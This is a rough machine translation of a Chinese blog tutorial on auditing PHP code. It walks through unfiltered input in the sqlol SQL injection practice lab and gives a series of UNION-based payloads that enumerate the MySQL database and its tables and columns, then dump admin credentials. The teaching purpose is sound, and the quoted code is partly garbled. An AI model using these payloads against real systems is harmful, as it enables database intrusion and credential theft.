"PHP Code Audit Example Tutorial" SQL injection –1. Nothing is filtered. Getting Started

Recent blog will be updated several PHP code audit tutorial, the article reproduced from a friend blog, the style of the article is concise and clear, and I used to insist on a blog style similar.

The article has been authorized (Cnbraid authorization), although not my original, but the article is very strong, I hope the small friends like.

0x01 background

First of all, congratulations to Seay Mage's masterpiece "Code Audit: Enterprise-class web code security Architecture", read two days deep feeling. Think of oneself also do audit for 2 years, decided to write a PHP code Audit example Tutorial series, hope to help the new people better understand this area, but also as a kind of precipitation. Daniel Please take a detour ~

0X02 Environment Construction

Php+mysql integration environment is particularly many, such as Phpstudy, Wamp and lamp, and so on the next step down to the successful installation, online search a lot of do not repeat.

The environment mentioned here is sqlol, a configurable SQL injection test platform that contains a simple SQL injection test environment that includes four elements of SQL statements (Insert), delete (delete), change (Update), and check (Select).

PS: There is nothing to filter the situation is too little, and now how not to contact the security of the programmer know that with some ready-made framework to write code, there are filtering. So this platform mainly trains how to do SQL injection in various situations and how to write a POC.

① source I packed a copy: Http://pan.baidu.com/s/1nu2vaOT

② extract to the WWW SQL directory, directly open the Http://localhost/sql can see the following interface:

0X03 Vulnerability Analysis

First look at the source structure, it is relatively simple, only one Include folder contains some database configuration files:

Here to do a simple source analysis, do not understand to skip the later look ~

1. Look at the select.php file and start introducing the/include/nav.inc.php

2. Follow up the nav.inc.php file and discover that the file is the core form submission page for select and the input handler:

Form input handler is relatively simple, mainly based on the choice of your form to make the appropriate filtering and processing, as follows

3. We return to select.php and find that there is a post-submit form handler that determines where to inject and constructs the SQL statement, followed by:

 ' . $_request[' inject_string '. '';}    else {//Here the SQL statement is constructed according to the location you choose to inject $display _column_name = $column _name = ' username ';    $display _table_name = $table _name = ' users ';    $display _where_clause = $where _clause = ' where isadmin = 0 ';    $display _group_by_clause = $group _by_clause = ' GROUP by username ';    $display _order_by_clause = er _by_clause = ' ORDER by username ASC ';    $display _having_clause = $having _clause = ' having 1 = 1 ';            Switch ($_request[' location ')} {case ' column_name ': $column _name = $_request[' inject_string ']; $display _column_name = '' . $_request[' inject_string '. '';        Break            Case ' table_name ': $table _name = $_request[' inject_string ']; $display _table_name = '' . $_request[' inject_string '. '';        Break Case ' where_string ': $where _clause = "where username = '". $_request[' inject_string '.            "'"; $display _where_clause = "where username = '".' . $_request[' inject_string '. '' .            "'";        Break Case ' Where_int ': $where _clause = ' where ISAdmin = '.            $_request[' inject_string ']; $display _where_clause = ' where ISAdmin = '. '' . $_request[' inject_string '. '';        Break Case ' group_by ': $group _by_clause = ' GROUP BY '.            $_request[' inject_string ']; $display _group_by_clause = ' GROUP BY '. '' . $_request[' inject_string '. '';        Break Case ' order_by ': er _by_clause = ' ORDER by '. $_request[' inject_string '.            ' ASC '; $display _order_by_clause = ' ORDER by '. '' . $_request[' inject_string '. '' .            ' ASC ';        Break Case ' have ': $having _clause = ' having isadmin = '.            $_request[' inject_string ']; $display _having_clause = ' having isadmin = '. '' . $_request[' inject_string '. '';    Break    } $query = "Select $column _name from $table _name $where _clause $group _by_clause er _by_clause";    /*probably a better-to-create $displayquery ... This allows me-underline the injection string in the resulting query that's displayed with the "Show query" Optio n without munging the query which hits the database.*/$displayquery = "Select $display _column_name from $display _ta Ble_name $display _where_clause $display _group_by_clause $display _order_by_clause ";} Include (' includes/database.inc.php ');//A package is introduced here, we continue to follow}?>

4. Follow up database.inc.php, finally brought into the query, so the form to understand, the whole process is not filtered ^ ^

$db _conn = newadoconnection ($DSN);p rint ("\ n
\ n
underlined): ". $displayquery. "\ n
"; $db _conn->setfetchmode (ADODB_FETCH_ASSOC); $results = $db _conn->execute ($query);

0x04 Vulnerability Proof

1. With the injection point, let's start by typing 1 and selecting the injection position as the number in the WHERE clause to turn on the Seay MySQL log monitor:

The 2.SQL query statement is: SELECT username from users WHERE isadmin = 1 GROUP by username ORDER by username ASC

Based on the SQL statements obtained in the MySQL log monitor, we can determine only one field to output, and then we construct the POC:

-1 Union Select 222333#

Locate the location of the output point "222333" such as:

3. Construct a POC that obtains information about the database:

-1 Union Select CONCAT (Database (), 0x5c,user (), 0x5c,version ()) #

The successful acquisition of the database name (sqlol), account name (root@localhost), and database version (5.6.12) are as follows:

4. Construct the POC that gets all the table information in the database sqlol:

-1 Union Select GROUP_CONCAT (DISTINCT table_name) from Information_schema.tables where table_schema=0x73716c6f6c#

Successfully obtained database sqlol all table information is as follows:

5. Construct the POC that gets all the field information for the admin table:

-1 Union Select Group_concat (DISTINCT column_name) from Information_schema.columns where table_name=0x61646d696e#

Successful Get Table admin all field information is as follows:

6. Construct the POC that gets the admin table account password:

-1 Union Select Group_concat (DISTINCT username,0x5f,password) from admin#

Successful access to the administrator's account password information is as follows:

Original address:

http://www.cnbraid.com/2015/12/17/sql0/

